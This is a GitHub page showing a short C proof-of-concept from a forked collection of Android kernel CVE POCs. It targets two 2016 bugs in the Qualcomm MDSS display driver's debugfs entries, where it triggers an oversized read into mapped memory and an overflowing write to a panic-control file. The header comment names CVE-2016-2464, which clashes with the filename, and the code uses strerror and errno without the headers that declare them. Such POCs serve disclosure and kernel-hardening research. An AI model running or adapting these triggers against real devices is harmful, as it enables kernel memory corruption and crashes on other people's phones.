forked from ScottyBauer/Android_Kernel_CVE_POCs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2016-2465-AND-CVE-2016-2489.c
66 lines (56 loc) · 1.28 KB
/
CVE-2016-2465-AND-CVE-2016-2489.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
/**
*
* CVE-2016-2464 And CVE-2016-2489.c
* https://code.google.com/p/android/issues/detail?id=201497
*
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
/**
*
* https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#777
*
*/
static void doMdssPerfModeReadArbWrite(void)
{
int fd = open("/sys/kernel/debug/mdp/perf_mode", O_RDONLY);
int ret;
void *mmap_ = mmap(NULL, 0x655350, PROT_READ | PROT_WRITE,
MAP_ANON | MAP_PRIVATE,
-1, 0);
if (mmap_ == MAP_FAILED) {
printf("Failed to get some vaddr with %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
if (fd > 0) {
ret = read(fd, mmap_, 0x655350);
close(fd);
}
}
/**
*
*
* https://android.googlesource.com/kernel/msm.git/+/android-msm-angler-3.10-marshmallow-mr1/drivers/video/msm/mdss/mdss_debug.c#880
*
*/
static void doMdssPanicWriteOverflow(void)
{
int fd = open("/sys/kernel/debug/mdp/perf/disable_panic", O_WRONLY);
int ret;
char ignore[32] = { 0xA };
if (fd > 0) {
ret = write(fd, ignore, sizeof(ignore));
close(fd);
}
}
int main(void) {
doMdssPanicWriteOverflow();
doMdssPerfModeReadArbWrite();
}